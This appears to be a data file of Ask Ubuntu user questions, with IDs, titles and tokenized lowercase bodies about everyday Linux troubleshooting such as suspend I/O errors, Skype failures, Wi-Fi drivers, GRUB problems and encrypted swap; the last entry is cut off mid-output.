505779	suspending with root on usb	i have a laptop running ubuntu 14.04 from a root file system on usb storage . this is not working well , because after wake up from suspend , ext4 will frequently try to write to the root file system before usb is ready . here is what i see in the kernel log when this happens , notice how i get a bunch of i/o errors on sda1 , and then one second later the usb storage drive is finally detected by the kernel . [ 2826.517419 ] wlan0 : associated [ 2826.517452 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 2827.575371 ] ext4-fs warning ( device sda1 ) : ext4_end_bio:317 : i/o error -5 writing to inode 1733735 ( offset 0 size 0 starting block 12629950 ) [ 2827.575380 ] buffer i/o error on device sda1 , logical block 12629694 [ 2827.575400 ] ext4-fs warning ( device sda1 ) : ext4_end_bio:317 : i/o error -5 writing to inode 3148603 ( offset 0 size 8192 starting block 12844470 ) [ 2827.575404 ] buffer i/o error on device sda1 , logical block 12844212 [ 2827.575411 ] buffer i/o error on device sda1 , logical block 12844213 [ 2827.575448 ] ext4-fs warning ( device sda1 ) : ext4_end_bio:317 : i/o error -5 writing to inode 3015015 ( offset 0 size 90112 starting block 6588832 ) [ 2827.575453 ] buffer i/o error on device sda1 , logical block 6588576 [ 2827.575461 ] buffer i/o error on device sda1 , logical block 6588577 [ 2827.575465 ] buffer i/o error on device sda1 , logical block 6588578 [ 2827.575469 ] buffer i/o error on device sda1 , logical block 6588579 [ 2827.575473 ] buffer i/o error on device sda1 , logical block 6588580 [ 2827.575477 ] buffer i/o error on device sda1 , logical block 6588581 [ 2827.575481 ] buffer i/o error on device sda1 , logical block 6588582 [ 2828.857284 ] sd 0:0:0:0 : [ sda ] no caching mode page found [ 2828.857293 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through at first there is no visible indication outside of the kernel log , that the problem has triggered , but if i let ubuntu stay running beyond this point , then the file system will get errors and eventually switch to read only mode . at that point i have to reboot into recovery mode and run fsck.ext4 manually from a root shell in order to repair the file system . is there some setting i can change such that access to the root device after waking from suspend can be delayed until the usb drive is ready ?
505781	can not install ubuntu within windows 8.1 , bios based	when i try to install ubuntu via bootable usb drive , it displays at the boot time , no operating system detected . and after that i tried to extract iso image file of ubuntu but that too did n't work saying `` can not download metalink and therefore the iso '' even if i place iso and wubi in same folder .
505784	sudo apt-get update command	when i trying to run the command sudo apt-get update am getting error as , e : malformed line 46 in source list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read .
505785	problem allowing memory with adobe flash player in firefox	whenever i try to play a game , like pillage the village using firefox , a flash window pops up asking me to allocate some memory . the error message is below : there is not enough memory to open this scene . try to allocate more memory to flash . when i click allow , does n't do anything . help
505786	install ubuntu on msata alongside windows on ssd ?	i just got a new laptop ( hp zbook 15 ) with a 128 gb msata sdd and a ( samsung 840 pro ) 256 gb ssd . during installation , i formatted the drives to remove any preinstalled crap and installed windows 7 on my ssd . unfortunately , windows created the system reserved partition on the msata drive . i want to install ubuntu on the msata drive and be able to dualboot . on my previous laptop with a single ssd , ubuntu gave an option to install besides windows and setup grub automatically . this time , ubuntu requires me to select the partitions myself but i have no idea how to go about correctly setting this up . a screenshot of my disk management overview can be found at thanks !
505787	how to install adobe flash player for embedded steam browser ( garry 's mod cinema gamemode )	i have tried to do .rpm and .tar.gz and nearly threw my linux out the window . any other way ?
505788	keyboard is not working in grub menu	my laptop key is not working in grub menu . i do n't have a dual-boot or usb keyboard attached . i have searched : here , here or here but all the options are either for dual boot system or for external usb [ ps/2 ] keyboards but my system is a laptop . * ( so this question is not a duplicate ! ) when my system starts it automatically shows grub ( advance recovery ) menu but no keys are working so how do i enter ? + the fan rotates heavily and after a minute my laptop shuts down automatically . what do i do , please help ? info : sony vaio c series , ubuntu 14.04 x64 updated
505789	skype does n't work anymore	today i got an update to skype 4.3 . i was really happy to see that and i immediately update it from 4.2 through software update program ( default in ubuntu ) . after the update i tried to start skype but after few seconds nothing happend . so i opened up terminal and typed command skype and i found the problem . there it is : user @ hostname : ~ $ skype gtk-message : failed to load module `` overlay-scrollbar '' gtk-message : failed to load module `` unity-gtk-module '' gtk-message : failed to load module `` canberra-gtk-module '' aborted i already tried to find unmet dependencies , but it seems that there is everything installed . i 'm using ubuntu 14.04.1 64-bit . how to solve that problem ?
505792	chmod is not working	i am unable to change the privileges of the directory or file which is not in desktop using chmod . while it is working properly for the directory and folders of desktop . am using the command chmod 000 /media/drivename/dirname what should i do ? ?
505795	problem after editing rc.local in ubuntu	i had a problem with qt creator debugger . i received this error whenever i tried to debug : ptrace : operation not permitted . could not attach to the process . make sure no other debugger traces this process . check the settings of /proc/sys/kernel/yama/ptrace_scope for more details , see /etc/sysctl.d/10-ptrace.conf so i followed the solution mentioned here and added the following line to /etc/rc.local echo 0 | tee /proc/sys/kernel/yama/ptrace_scope the problem starts here ! after rebooting , my desktop appearance has changed , i cant change the desktop background , there are many icons in my launcher ( ubuntu 's default icons like ubuntu one , amazon , libreoffice , etc . ) and even after removing them they keep showing up after system reboot . my touch-pad scrolling is not working and also my other disk drives are not mounted like they were before . i tried removing the line mentioned above from rc.local file , but its not changing anything . i even tried removing rc.local file but it didnât help either . can anyone help me with this problem please ? it 's really freaking me out ! i 'm using ubuntu 13.04 .
505796	webdav server/client crash when uploading more than 750mb ( apache2 + nautilus )	i am running an apache server with ssl and basic auth ( .htpasswd ) and webdav enabled for a share . i have 2gb ram , the server is dual core and has plenty of hdd space available ( 3tb ) . i can successfully upload lots of photos ( like 400 files 5mb each ) , but if i try to upload a 1gb mkv on the webdav server , the client crashes . every time i try to upload one big file , it crashes on 750mb . i only tried with nautilus 'connect to server davs : // ' , but i tried from multiple ubuntu machines , 12.04 and 14.04 . the server is 14.04 . there is nothing in the logs , neither on the client or server . when i say crash i mean i hangs on there ( 750mb ) for some seconds , and if i do n't close it , it eats up all the client ram until it crashes . it also eats up cpu , but the upload never continues . one of the machines even restarted when i did n't force kill nutilus . is there any file size limit i can increase ( like php 's post limit ? ) or do i need to switch to some other file share protocol , like samba ? i liked webdav because it is apache and i can use client cert auth , web browsing and other things .
505797	can a script that is run as root , run another script as normal user ?	so , if i run script as root using gksu , can that script run another script as normal user ? thanks !
505798	skype has stopped working on ubuntu studio 14.04.1	this is what skype displays when i try to connect . i 've tried reinstalling , but still no fix . when i sign in on my mobile phone it works , so i know it 's an issue affecting only the desktop version .
505799	how to make the system detect correctly charge status ?	yesterday , after correctly performed the installation of ( uefi ) ubuntu 14:04 lts 64-bit in dual-boot with windows 8.1 64-bit on my laptop asus a551ln i had a serious problem : the operating system did not realize when the power supply was connected or not , it was as if i were always on battery , resulting in a lack of charge when it was connected to the power source , moreover after using ubuntu , then , neither windows was able to charge the battery ( but recognizing the connection status of the power supply ) . it 's a shame , because the rest works , belonging to the fn + fx to increase / decrease the brightness . i state that i had also encountered this problem using it on live-cd ... does anyone know how to fix it or i 'll have to wait for the next release of ubuntu hoping that will solve this problem ? meanwhile , i use windows which fortunately runs well ... at least for now ... and luckily after using only windows the battery now has been charged ... thanks in advance
505804	how do i run main file which function is store in another file and also the header file too ?	// mainheader.h int square ( int b ) ; // mainfunction.c # include '' mainheader.h '' # include < stdio.h > int square ( int b ) { int y ; y= b*b ; return ( y ) ; } //=====main.c file # include < stdio.h > // # include < stdlib.h > # include < math.h > # include '' mainheader.h '' # include '' mainfunction.h '' main ( void ) { //int sizeofdata , j ; int i , z ; for ( i=0 ; i < 5 ; i++ ) { z=square ( i ) ; printf ( `` % d\n '' , i ) ; } } how do i run this program in ubuntu ?
505805	unable to have full screen ubuntu in virtualbox	i am trying to install ubuntu 14.2.16 on virtualbox . it has installed correctly , but i was having a problem related to window size . it is not possible for me to switch ubuntu in full screen mode . i got some solution for that i.e . installing guest additions . but afterwords i got error : unable to mount c : program files/oracle/virtualbox/guestassitions.iso for that i got one solution . ( unable to mount the cd/dvd image on the machine sandbox ) i followed all steps given by but as it says about vboxlinuxadditions.run file , it should be executable . but file i am having in my host pc is not executable . i even checked settings in file property , its type is program still not executable , its opening in text editor . what should i do now ? even if anybody could suggest me different solution for switching it in full screen it would be really helpful .
505806	cheese for hp laptop with ubuntu 12.04	i ca n't install cheese on my laptop . i tried using the help button in my laptop and looked for photos and clicked the `` install '' button but , the button can not be clicked . i am not very familiar with ubuntu , i badly need assistance .
505810	ubuntu 14.04.1 lts : problem with skype	eventually i have made the decision to get rid of windows and go for ubuntu ! ! i had been thinking to do so for long time , but i was keeping putting it off . so , i am excited , but i have also started to hit the first issues : ) . i now have a problem with skype , and that 's why i am writing . my ubuntu version is the following : davide @ gis74 : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 14.04.1 lts release : 14.04 codename : trusty i installed skype a couple of weeks ago and it had worked fine until this morning . since this morning i can no longer connect to it and i have been getting the following notification : an error occurred , please run package manager from the right-click menu or apt-get in a terminal to see what is wrong . the error message was : 'unknown error : '' ( `` the cache has no package named 'skype-bin ' '' ) ' this usually means that your installed packages have unmet dependencies i did some research without too much luck . i am posting some of the commands output i seem to understand can be useful to debug the issue : davide @ gis74 : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done 0 to upgrade , 0 to newly install , 0 to remove and 26 not to upgrade . davide @ gis74 : ~ $ sudo apt-cache policy 'skype* : *' skype : installed : 4.2.0.11-0ubuntu0.12.04.2 candidate : 4.3.0.37-0ubuntu0.12.04.1 version table : 4.3.0.37-0ubuntu0.12.04.1 0 500 http : //archive.canonical.com/ubuntu/ trusty/partner amd64 packages *** 4.2.0.11-0ubuntu0.12.04.2 0 100 /var/lib/dpkg/status skype4pidgin : installed : ( none ) candidate : ( none ) version table : skype-mid : installed : ( none ) candidate : ( none ) version table : pidgin-skype-dbg : installed : ( none ) candidate : 20130613+svn660+dfsg-1 version table : 20130613+svn660+dfsg-1 0 500 http : //gb.archive.ubuntu.com/ubuntu/ trusty/multiverse amd64 packages skype-bin : installed : ( none ) candidate : ( none ) version table : skype-common : installed : ( none ) candidate : ( none ) version table : empathy-skype : installed : ( none ) candidate : 20130613+svn660+dfsg-1 version table : 20130613+svn660+dfsg-1 0 500 http : //gb.archive.ubuntu.com/ubuntu/ trusty/multiverse amd64 packages pidgin-skype : installed : ( none ) candidate : 20130613+svn660+dfsg-1 version table : 20130613+svn660+dfsg-1 0 500 http : //gb.archive.ubuntu.com/ubuntu/ trusty/multiverse amd64 packages pidgin-skype-common : installed : ( none ) candidate : 20130613+svn660+dfsg-1 version table : 20130613+svn660+dfsg-1 0 500 http : //gb.archive.ubuntu.com/ubuntu/ trusty/multiverse amd64 packages i was thinking to re-install/upgrade skype but i am not sure how to do it . can anyone please help ? many thanks , davide
505812	ways of calculating required disk space prior to package download	the following is no duplicate of how to determine the size of a package while using apt prior to downloading ? , it is more an additional question . consider the following two implementations to get the required disk space : # ! /bin/bash echo n | sudo apt-get install $ list | grep `` disk space '' | awk ' { print $ 4 , $ 5 } ' and # ! /bin/bash package_list= $ ( dpkg -- get-selections | awk ' { print $ 1 } ' | grep -v -e `` -dbg '' | cut -f1 -d '' : '' ) getsize ( ) { size= $ ( apt-cache -- no-all-versions show $ 1 | grep installed-size | awk ' { print $ 2 } ' ) ( ( needed+= $ size ) ) } for package in $ list ; do getsize $ package dependencies= $ ( apt-cache depends $ package | grep depends | awk ' { print $ 2 } ' ) for dependency in $ dependencies ; do if [ [ ! $ package_list =~ [ ^. [ : alnum : ] - ] '' $ dependency '' [ ^ . [ : alnum : ] - ] ] ] ; then getsize $ dependency fi done done echo `` $ needed kb '' in theory they should return similar results , but for big packages in $ list they return very different results , the second implementation returns much bigger results ( for example 13.5 gb vs 16.2 gb ) . i know the second implementation is slower , because it tries to do the job of apt-get in bash , which is a lot slower , but my intention of writing the second version was to get the result in kb , because i was not able to find out how to get the result in kb from the first implementation , mainly because apt-get scales the unit , from bytes up to gigabytes and i do not know , whats the biggest unit it considers . could someone help me find out why there is such a big difference ?
505814	can not add a new user	i am trying to add a new user to my ubuntu 14.04 os . i go system settings - > user accounts and try to click the [ + ] button , but nothing happens it is grayed out . the system did not ask me for administrator password , why ? is this a bug ?
505819	grave accent key is not working	i am using ubuntu since august 2010 . now , i am using ubuntu 14.04 with gnome-shell 3.12.1 . i was trying to find shortcut for toggling language but it could n't work and my grave accent key ( ` ) is also disabled . now , whenever i am pressing this key on my keyboard , it works as esc key . can some-one tell me how can i configure it ? can some-one tell me how can i define a key-board shortcut key for input languages-toggling . when i am pressing command `` xev -event keyboard '' then it opens a small window and in that if i press grave key ( ` ) then the output is as : keypress event , serial 28 , synthetic no , window 0x4000001 , root 0x2bb , subw 0x0 , time 2422193 , ( 366,566 ) , root : ( 368,710 ) , state 0x0 , keycode 49 ( keysym 0xff1b , escape ) , same_screen yes , xkeysymtokeycode returns keycode : 9 xlookupstring gives 1 bytes : ( 1b ) `` '' xmblookupstring gives 1 bytes : ( 1b ) `` '' xfilterevent returns : false keyrelease event , serial 28 , synthetic no , window 0x4000001 , root 0x2bb , subw 0x0 , time 2422339 , ( 366,566 ) , root : ( 368,710 ) , state 0x0 , keycode 49 ( keysym 0xff1b , escape ) , same_screen yes , xkeysymtokeycode returns keycode : 9 xlookupstring gives 1 bytes : ( 1b ) `` '' xfilterevent returns : false
505822	graphic drivers on my lenovo g505s	i couldnt find any related topic so i am going to start a new one . i have lenovo notebook g505s with this configuration : a10-5750m 2,50 ghz ( this cpu is quad core with graphic included into it ) radeon hd 8750m 4 gb of ram ssd 60 gb kingston can you please tell me what drivers do i need to install since this is hybrid graphic card and how will linux switch between cpu graphic card and external radeon graphic card . thanks for your answers !
505824	microphone - external sound card noise suppression	i have the same problem as described here , so i tried to solve it with procedure in reply . when everything was installed i changed files according to reply and restarted computer . when computer rebooted i opened up pavucontrol and looked to input devices . i found out that mentioned fix for background noise works only for internal sound card , not for external . is there a possibility to enable noise/echo cancellation for external sound card - in image is listed as audio adapter analog mono ?
505825	need help about proxmox and grub2 on debian	i am facing with a big problem . i am freshly installed debian 7 on server4you dedicated server , and according to this tutorial : link i am added the repo , installed the kernel like the tutorial said but i am stuck with this : '' make sure to select proxmox ve kernel on the boot loader ( grub2 ) - attention : default is the 3.2 kernel reboot : now restart the system using the proxmox ve kernel. `` how i am supposed to do this if i do n't have kvm screen access ? can somebody please tell me what exactly i have to do on grub2 ?
505826	my gnome 3 looks different ?	i am a ubuntu newbie . i followed this tutorial to install gnome 3 on my ubuntu precise pangolin . i was expecting a desktop like this : and i ended up with a desktop like this : please tell me what i can do to get the desired desktop . nb : i have dual-booted using wubi .
505827	occasional hdmi hiccups for a few seconds on nuc with ubuntu 14.04	i have an intel nuc system with ubuntu 14.4 installed . occasionally , the screen ( a philips tv connected using a hdmi cable ) will go black and mute , then come back to life a few seconds after . i checked the cable connections , and they do n't look like they 're loose . it does n't happen a lot but when such a `` hiccup '' happnes it 's really annoyng . any idea what might be causing this ? i do n't know if it 's a hardware or an os issue , but i figured i might try to ask here .
505828	very slow wifi on ubuntu 14.04.1 ( rtl8191sevb )	my laptop is dual-booted with microsoft windows 7 ultimate ( x64 ) and ubuntu 14.04.1 ( x64 ) . when it 's booted in microsoft windows 7 ultimate , with the appropriate realtek driver installed , i get around 500 kbyte/sec download . although when i 'm booted in ubuntu 14.04.1 , without having manually installed drivers ( though i 'm pretty sure ubuntu installed some himself ) , my download speed speed is as low as < 100 kbyte/sec . the laptop used to have older ubuntu versions running where the wifi worked fine . i 've tried downloading the appropriate driver source from realtek driver repository , but was unable to compile the source because it seems to be targeted at older kernel versions ( i believe ) . the 8191se driver does n't appear to have a win2k versions , so `` ndiswrapper '' does n't seem an option either . is there any way i could speed up my wifi in ubuntu 14.04.1 ? > lspci 14:00.0 network controller : realtek semiconductor co. , ltd. rtl8191sevb wireless lan controller ( rev 10 )
505833	wi-fi not working with my router but works with other access points	i recently bought a d-link router and configured it . from my android , the access point is providing full internet access . my ubuntu laptop gets internet access from other access points . the problem is i can not get internet access with just my router ( i also had tried connecting to a router some time back and had this same problem , but i switched to ethernet then ) . i can connect to the network , but if i try pinging the router i get a destination host unreachable error . i can not discover my router with nmap either . nmap just gives my own computer ( not even the android device ) . ethernet connection to my router works perfectly fine . here are the configurations : prakhar @ as4v4g3world : ~ $ sudo iwconfig wlan0 wlan0 ieee 802.11abg essid : '' arm4g3ddon-2.4ghz '' mode : managed frequency:2.437 ghz access point : c4 : a8:1d:8c:99 : ac bit rate=52 mb/s tx-power=200 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off link quality=70/70 signal level=-25 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 prakhar @ as4v4g3world : ~ $ cat /etc/network/interfaces # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback auto wlan0 iface wlan0 inet loopback prakhar @ as4v4g3world : ~ $ sudo lshw -c network *-network description : wireless interface product : bcm4313 802.11bgn wireless network adapter vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0a:00.0 logical name : wlan0 version : 01 serial : < removed > width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.30.223.141 ( r415941 ) ip=192.168.0.100 latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:19 memory : d4500000-d4503fff *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:0b:00.0 logical name : eth0 version : 07 serial : < removed > size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl8168e-3_0.0.4 03/27/12 latency=0 link=yes multicast=yes port=mii speed=1gbit/s resources : irq:43 ioport:2000 ( size=256 ) memory : d4404000-d4404fff memory : d4400000-d4403fff prakhar @ as4v4g3world : ~ $ sudo ifconfig -a eth0 link encap : ethernet hwaddr a0 : b3 : cc:46:93:05 inet addr:192.168.0.102 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :a2b3 : ccff : fe46:9305/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:3207 errors:0 dropped:0 overruns:0 frame:0 tx packets:4052 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1858395 ( 1.8 mb ) tx bytes:662320 ( 662.3 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:6960 errors:0 dropped:0 overruns:0 frame:0 tx packets:6960 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:594878 ( 594.8 kb ) tx bytes:594878 ( 594.8 kb ) wlan0 link encap : ethernet hwaddr 84:4b : f5 : aa:01 : bf inet addr:192.168.0.4 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :864b : f5ff : feaa:1bf/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:68 errors:0 dropped:0 overruns:0 frame:9105 tx packets:325 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:10677 ( 10.6 kb ) tx bytes:38468 ( 38.4 kb ) interrupt:19 detailed info is here . i have run out of ideas . any help ? edit : so i logged on to windows 8.1 and still the same : connected but no internet . i went to the hp website ( i own a dv6 ) and downloaded this . it 's broadcom driver version 6.30.59.49 , released in 2012 ! and voila it works . sometimes i envy windows support . so i dug deeper and found this launchpad bug . it was confirmed in may 2014 and still no resolution : ( . i have tried broadcom-sta , brcmac , wl , even the proprietary driver listed in additional sources ( it 's sta i think ) . nothing works . does anybody have a clue ? edit : solved . here 's the new driver + configuration in case anyone else needs it .
505834	a question about md5sum	can i be sure , that a burned ubuntu dvd with right md5 checksum result is free of any malware or could there still be malware on the dvd f.e . in case it was created on a already infected pc ? regards boomx4
505838	ibus not responding	i am using ibus for typing in hindi language . after changing input method to hindi , it is unable to change back to english or disable the ibus input method . this seems to be a bug . i am using ubuntu 12.04 how this can be corrected .
505842	unable to update from 12.04 to 14.04 using update manager	when i type hwe-support-status -- verbose i get `` forcefully disabled hwe-support-status via file /var/lib/update-notifier/disable-hwe-eol-messages . when i try to update via update manager i get a message fetch failed to upgrade . there maybe a network problem . anybody who can help me to upgrade to latest version of ubuntu i would be grateful .
505846	i am unable to upgrade from 13.10 to 14.04	here is the message i get in updater and the terminal : an unresolvable problem occurred while calculating the upgrade . this can be caused by : * upgrading to a pre-release version of ubuntu * running the current pre-release version of ubuntu * unofficial software packages not provided by ubuntu if none of this applies , then please report this bug using the command 'ubuntu-bug ubuntu-release-upgrader-core ' in a terminal . any suggestion is appreciated .
505848	accessing files with permissions through live cd of ubuntu for backing up the entire files of a previous installation	hi all iam having an ubuntu istallation on my laptop which happens to be not working , i need to back up my data as the ubuntu is not booting up . but when i tried to back up data by connecting the hard drive through hard disk enclosure on a different pc though live usb feature of ubuntu , there are some files of my personal data which can not be accessed and says i do not have permissions to use , read or open . can anyone please provide me a solution
505849	how should i use manual partition ?	well , i 'm just moving from windows platform to ubuntu and i 'm stuck at how to use manual partition . i do n't want to preserve any previous windows installation or previous data too . my windows drives were as follows : local drive c : [ 200 gb ] ( approx ) : contained windows + other softwares local drive d : [ 200 gb ] ( approx ) : contained my development stuff ( different projects in different folders with git init ) local drive e : [ what 's left ] : games . if i need to follow somewhat same scheme in ubuntu installation , how should i proceed ? specs if needed : hdd [ 500gb ] , ram [ 4gb ] , processor [ intel core i3 2.5ghz ]
505850	installing samsung m2020 printer	i have found relevant ppd files but it gives me this when i try to print printer 'samsung-m2020-series ' requires the '/usr/lib/cups/filter/rastertospl ' program but it is not currently installed .
505852	why wo n't my ubuntu gnome accept my google password ?	i am using ubuntu gnome 14.04 . i integrated my google account with it . but every time i login gnome asks for my google account password . but when i give it , it simply wont accept it ! i am 100 % sure i am typing the right password for my google account ( it does n't have 2 step verification at present . i was using it before but not now . ) since it did n't work i tried my login password but that too did n't work . then i removed integration for that account from `` online accounts '' then removed all my cache and tried integrating again . it integrates , but again , if i type in my password when asked for , the same issue persists . here is a screen shot : ( asking for password : ) ( after right password is given : ) i tried following this answer partly ( i deleted goa-1.0 but not evolution since it would delete my evolution configuration which i want ! ) but deleting goa-1.0 did n't let me integrate my google account at all and so it does n't work ! ( i recreated goa-1.0 and now i can reintegrate my account but the password issue persists ) . so now my question is : how do i integrate my google account with my ubuntu gnome without any such issues as explained above ? ps : - should i be doing something with seahorse here ? i dunno how it works and all and so if i have to use it , tell me what to do elaborately .
505853	how to save desktop session with unity ?	is there a native way provided by unity to save an arbitrary desktop session , in order to restore it during next system start ? by desktop session , i refer to all the applications currently running with their windows states regarding work spaces and such . to make things clear , i do not want to just use any hibernate modes to switch off the computer . nor do i want to add applications to the autostart configuration , as this does not solve the issue of having your latest session restored . while doing research , i found quite a few similiar questions , just like save unity desktop session . however , those threads are rather old or have no real solution provided . my concern is ubuntu 14.04. default installation ( thus , using unity as a window manager ) . your help is much appreciated . best regards ron
505854	how long for a stable installation for ubuntu 14.04 ?	i know that when a new release is published it means that is tested for a long time , but during the first weeks it happened to discover some bugs , and going on the bugs are decreasing . i installed 14.04 on my notebook just yesterday and i will make some tests on and i know i will solve any problems with internet help . i would like to install ubuntu on old relatives pcs , but i would like to give them pcs where they can have fun with no problem ( or very few ones ) ... with a lot of amazement i discover that a lot of user suggest to install ubuntu 12.04 that seems more stable than the lastest version . i think it is not a stupid idea , but i do not need to pass to ubuntu quickly , so i prefer to wait for the new version ( 14.04 ) . the question is : when it will be the right moment for ubuntu 14.04 ?
505866	dead link in the ubuntu 's launcher	i 'm trying to lock eclipse 's icon to the launcher for a fast and easy access to it , using the simplest way of launching eclipse , and then right clicking the eclipse icon at the launcher and choosing `` lock to launcher '' , and indeed when i then close eclipse , its icon is locked in the launcher . the problem is , when i then click the icon launcher to open eclipse , the icon just flickers ( blinks ) for two or three times ( meaning - it seems like it 's gon na start ) , but then it stops and nothing happens - eclipse wo n't open . i might also mention that is seems like this is the only application i have this trouble with . i tried to lock some other applications ( like the calculator , for example ) , then close them and reopen , and they indeed were launched properly . does anyone know how to fix this ?
505867	are there any plans to simplify console service management on ubuntu ?	i am quite perplexed about the direction in which service management is going on ubuntu and the funny part is that the same seems to be happening with os x but that 's another story . i do appreciate simplicity and doing service srv start|stop|restart was nice and always displiked the fact the service can not enable and disable services ( even if these commands are not implemented by the called scripts ) . to overcome this i was using update-rc.d srv enable|disable or even installing chkconfig to do the same . now with upstart things seems to go worse instead of better and i am wondering if anyone is working on fixing this , or the desire of what would be the easy way to manage the services ? ( ubuntu 12.04,14.04+ ) optional : is there a bug/feature request for improving it ? use case : as a ( root ) user i want to be able to easily perform these actions : * start , stop , restart service * enable/disable service * list current services and their enabled/disabled state * list current services and their running/stopped state * ( optional ) have a simple bash-able way to check if a service is enabled/disabled , running or stopped . ps . do n't say a thing about gui tools , please .
505868	ubuntu 12.04 lts : display settings change whenever keyboard is used , and some other weirdness	i 'm really troubled by some issues that started showing up shortly after doing the whole `` new hardware support '' upgrading yesterday . among other things , ubuntu now seems to take longer time to boot , but the most glaring issue is that the display settings are all messed up ! i 'm on a laptop , and the display settings show that apparently i should have a second laptop monitor , which i do n't . to keep things from looking weird , i had to turn it off from the display settings . but sometimes the display settings change whenever i press a button on the keyboard , which causes graphical glitches and is generally annoying . i find that if this starts happening , the only way out of it is to restart the computer and hope for the best . it usually starts happening just after logging in if it happens , but sometimes the problem does n't show up . i found that when these things happen , the display settings cycle through three settings . one is `` normal '' , where the non-existant display is turned off . number two seems to be where both displays are on , which causes some graphical glitches such as mouse flickering . the third setting has both displays on and `` mirror display '' and the `` sticky edges '' settings turned on . my system information is the following : memory : 7.6 gib processor : amd phenom ( tm ) ii n950 quad-core processor ă 4 os type : 64-bit graphics card : ati mobility radeon hd 5650 ( computer seems to register this as unknown , but i know it 's this card ) disk : 179.2 gb could someone please give me some advice about what to do to fix these problems ?
505869	swap partition wo n't mount !	i 'm using ubuntu 14.0 32bit on my pc . when ubuntu starts it wo n't mount swap partition and every time i have to enable it manually using gparted . /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda7 during installation uuid=a8375b84-987c-4270-85ac-0accd8682008 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda6 during installation # uuid=c399c299-23f2-4c06-b6b7-aab8ef70d98b none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw , noauto 0 0 /dev/disk/by-uuid/5d8d832e-a440-45b7-b3fe-4793f0b678f3 /media/omid/backup auto nosuid , nodev , nofail 0 0 also when i open system monitor , i see that swap is not available . what should i do ?
505872	why are apt-get repositories hardcoded to a specific release ?	from the usability point of view , i do not understand why on each release upgrade you have to manually patch all the urls of apt in order to make them point to the newer distribution . why is not possible for apt to auto-detect the current and use it , so when you upgrade there is no need to upgrade the urls anymore ?
505876	after mounting an exfat drive under linux i am now unable to mount in on my mac	i used sudo apt-get install exfat-utils exfat-fuse to be able to mount an exfat drive under linux . this worked perfectly . however , the partition is now not visible on my mac anymore ! did the mounting process somehow alter the filesystem ?
505877	i installed gcc-4.9 but when i type gcc -v i get 4.6.3	i recently installed gcc-4.9 on ubuntu 12.04 but when i type gcc -v it says gcc version 4.6.3 . the gcc 4.9 version was installed using the following command as root sudo apt-get install gcc-4.9
505880	message disk drive for /dev/mapper/cryptswap1 is not ready yet or not present even after trying various options	i have tried the advice here : puny geek including the last amendments . and here askubuntu including the advice further down for 14.04 i am running xubuntu 14.04 on an older system . i just upgraded the memory for what it is worth . but none of them work . i realise this has been asked before but as no response fits my case please understand why i am posting what is a question often asked . i can work with swap but when rebooting it seems to ignore and i have no swap again . i have amended the /etc/fstab and /etc/cryptab and /etc/initramfs-tools/conf.d/resume and nothing works . $ free -m shows total used free shared buffers cached mem : 2015 364 1651 10 65 145 -/+ buffers/cache : 153 1862 swap : 0 0 0 and $ sudo fdisk -l shows disk /dev/sdc : 123.5 gb , 123522416640 bytes 255 heads , 63 sectors/track , 15017 cylinders , total 241254720 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0003e24c device boot start end blocks id system /dev/sdc1 2048 241254399 120626176 83 linux disk /dev/sdb : 60.0 gb , 60022480896 bytes 255 heads , 63 sectors/track , 7297 cylinders , total 117231408 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x32ae6f1f device boot start end blocks id system /dev/sdb1 2048 6146047 3072000 82 linux swap / solaris /dev/sdb2 * 6148096 117229567 55540736 83 linux disk /dev/sda : 1000.2 gb , 1000170586112 bytes 255 heads , 63 sectors/track , 121597 cylinders , total 1953458176 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x6bd593d7 device boot start end blocks id system /dev/sda1 * 2048 1953458175 976728064 7 hpfs/ntfs/exfat disk /dev/mapper/cryptswap1 : 3145 mb , 3145728000 bytes 255 heads , 63 sectors/track , 382 cylinders , total 6144000 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes 